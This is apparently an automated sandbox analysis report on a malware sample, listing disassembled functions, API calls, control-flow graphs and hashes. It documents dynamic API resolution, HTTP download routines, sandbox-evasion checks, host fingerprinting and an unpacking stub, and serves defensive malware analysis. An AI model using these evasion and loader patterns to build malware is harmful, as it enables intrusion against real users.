                                    • GetProcAddress.KERNEL32(75070000,00A197A8), ref: 0041A47F
                                    • GetProcAddress.KERNEL32(75070000,00A195E0), ref: 0041A497
                                    • GetProcAddress.KERNEL32(74E50000,009E4968), ref: 0041A4B8
                                    • GetProcAddress.KERNEL32(74E50000,009E4A08), ref: 0041A4D1
                                    • GetProcAddress.KERNEL32(75320000,009E4A68), ref: 0041A4F2
                                    • GetProcAddress.KERNEL32(75320000,00A194D8), ref: 0041A50A
                                    • GetProcAddress.KERNEL32(6F060000,009E47A8), ref: 0041A530
                                    • GetProcAddress.KERNEL32(6F060000,009E4888), ref: 0041A548
                                    • GetProcAddress.KERNEL32(6F060000,009E48C8), ref: 0041A560
                                    • GetProcAddress.KERNEL32(6F060000,00A19640), ref: 0041A579
                                    • GetProcAddress.KERNEL32(6F060000,009E47C8), ref: 0041A591
                                    • GetProcAddress.KERNEL32(6F060000,009E46E8), ref: 0041A5A9
                                    • GetProcAddress.KERNEL32(6F060000,009E4748), ref: 0041A5C2
                                    • GetProcAddress.KERNEL32(6F060000,009E48E8), ref: 0041A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                    • GetProcAddress.KERNEL32(74E00000,00A194F0), ref: 0041A629
                                    • GetProcAddress.KERNEL32(74E00000,00A12D50), ref: 0041A641
                                    • GetProcAddress.KERNEL32(74E00000,00A19580), ref: 0041A659
                                    • GetProcAddress.KERNEL32(74E00000,00A196E8), ref: 0041A672
                                    • GetProcAddress.KERNEL32(74DF0000,009E46C8), ref: 0041A693
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19550), ref: 0041A6B4
                                    • GetProcAddress.KERNEL32(6F9B0000,009E4708), ref: 0041A6CD
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19610), ref: 0041A6E5
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19508), ref: 0041A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                    • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                    • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                    • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                    Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                    • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                    • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00406503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3074848878-2509457195
                                    • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                    • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                    Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1105 4118c0-4118c3 1074->1105 1106 4118ca 1074->1106 1085 4118e2-4118e5 1075->1085 1086 4118ec 1075->1086 1076->1070 1087 411904-411907 1077->1087 1088 41190e 1077->1088 1093 411964-411967 1078->1093 1094 41196e 1078->1094 1096 411983-411986 1079->1096 1097 41198d 1079->1097 1089 411930 1080->1089 1090 411926-411929 1080->1090 1091 411945-411948 1081->1091 1092 41194f 1081->1092 1082->1070 1101 411870-411873 1083->1101 1102 41187a 1083->1102 1103 411892-41189c 1084->1103 1104 41189e-4118a1 1084->1104 1085->1086 1086->1070 1087->1088 1088->1070 1089->1070 1090->1089 1091->1092 1092->1070 1093->1094 1094->1070 1096->1097 1097->1070 1101->1102 1102->1070 1110 4118a8 1103->1110 1104->1110 1105->1106 1106->1070 1110->1070
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcessstrtok_s
                                    • String ID: block
                                    • API String ID: 3407564107-2199623458
                                    • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                    • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                    Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1154 415693-4156a9 call 41aad0 StrCmpCA 1129->1154 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1154 1161 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1154->1161 1162 4156af-4156b6 1154->1162 1159->1154 1291 415ac3-415ac6 1161->1291 1165 4157da-41585f call 41aad0 StrCmpCA 1162->1165 1166 4156bc-4156c3 1162->1166 1185 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1165->1185 1186 415865-41586c 1165->1186 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1166->1171 1170->1165 1171->1165 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1185->1291 1192 415872-415879 1186->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1186->1193 1201 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1201 1202 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1202 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1201->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1201->1296 1202->1193 1222->1127 1223->1291 1271->1165 1296->1193
                                    APIs
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                      • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3630751533-2791005934
                                    • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                    • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                    Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                    • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                    • wsprintfA.USER32 ref: 00417640
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 3790021787-3809124531
                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                    Function 007E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1344 7e003c-7e0047 1345 7e004c-7e0263 call 7e0a3f call 7e0e0f call 7e0d90 VirtualAlloc 1344->1345 1346 7e0049 1344->1346 1361 7e028b-7e0292 1345->1361 1362 7e0265-7e0289 call 7e0a69 1345->1362 1346->1345 1364 7e02a1-7e02b0 1361->1364 1366 7e02ce-7e03c2 VirtualProtect call 7e0cce call 7e0ce7 1362->1366 1364->1366 1367 7e02b2-7e02cc 1364->1367 1373 7e03d1-7e03e0 1366->1373 1367->1364 1374 7e0439-7e04b8 VirtualFree 1373->1374 1375 7e03e2-7e0437 call 7e0ce7 1373->1375 1377 7e04be-7e04cd 1374->1377 1378 7e05f4-7e05fe 1374->1378 1375->1373 1380 7e04d3-7e04dd 1377->1380 1381 7e077f-7e0789 1378->1381 1382 7e0604-7e060d 1378->1382 1380->1378 1386 7e04e3-7e0505 LoadLibraryA 1380->1386 1384 7e078b-7e07a3 1381->1384 1385 7e07a6-7e07b0 1381->1385 1382->1381 1387 7e0613-7e0637 1382->1387 1384->1385 1389 7e086e-7e08be LoadLibraryA 1385->1389 1390 7e07b6-7e07cb 1385->1390 1391 7e0517-7e0520 1386->1391 1392 7e0507-7e0515 1386->1392 1388 7e063e-7e0648 1387->1388 1388->1381 1394 7e064e-7e065a 1388->1394 1400 7e08c7-7e08f9 1389->1400 1395 7e07d2-7e07d5 1390->1395 1393 7e0526-7e0547 1391->1393 1392->1393 1398 7e054d-7e0550 1393->1398 1394->1381 1399 7e0660-7e066a 1394->1399 1396 7e07d7-7e07e0 1395->1396 1397 7e0824-7e0833 1395->1397 1401 7e07e4-7e0822 1396->1401 1402 7e07e2 1396->1402 1406 7e0839-7e083c 1397->1406 1403 7e0556-7e056b 1398->1403 1404 7e05e0-7e05ef 1398->1404 1405 7e067a-7e0689 1399->1405 1407 7e08fb-7e0901 1400->1407 1408 7e0902-7e091d 1400->1408 1401->1395 1402->1397 1409 7e056f-7e057a 1403->1409 1410 7e056d 1403->1410 1404->1380 1411 7e068f-7e06b2 1405->1411 1412 7e0750-7e077a 1405->1412 1406->1389 1413 7e083e-7e0847 1406->1413 1407->1408 1414 7e057c-7e0599 1409->1414 1415 7e059b-7e05bb 1409->1415 1410->1404 1416 7e06ef-7e06fc 1411->1416 1417 7e06b4-7e06ed 1411->1417 1412->1388 1418 7e084b-7e086c 1413->1418 1419 7e0849 1413->1419 1427 7e05bd-7e05db 1414->1427 1415->1427 1421 7e06fe-7e0748 1416->1421 1422 7e074b 1416->1422 1417->1416 1418->1406 1419->1389 1421->1422 1422->1405 1427->1398
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 007E024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: cess$kernel32.dll
                                    • API String ID: 4275171209-1230238691
                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction ID: 16dd53b31e236c2b8353203991b07fb74fcb2fe72e53336b0df64afbb24c18c3
                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction Fuzzy Hash: 87528874A01269DFDB64CF69C984BA8BBB1BF09304F1480D9E90DAB351DB74AE94DF10
                                    Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7E58), ref: 004198A1
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7E70), ref: 004198BA
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7EE8), ref: 004198D2
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7EB8), ref: 004198EA
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7ED0), ref: 00419903
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E4F10), ref: 0041991B
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E45A8), ref: 00419933
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E45E8), ref: 0041994C
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7F00), ref: 00419964
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7F18), ref: 0041997C
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12950), ref: 00419995
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12B90), ref: 004199AD
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E42C8), ref: 004199C5
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12A70), ref: 004199DE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                      • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                      • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                      • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                      • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                    • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                      • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                    • ExitProcess.KERNEL32 ref: 00416B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 3511611419-0
                                    • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                    • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                    • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                    • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                    Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

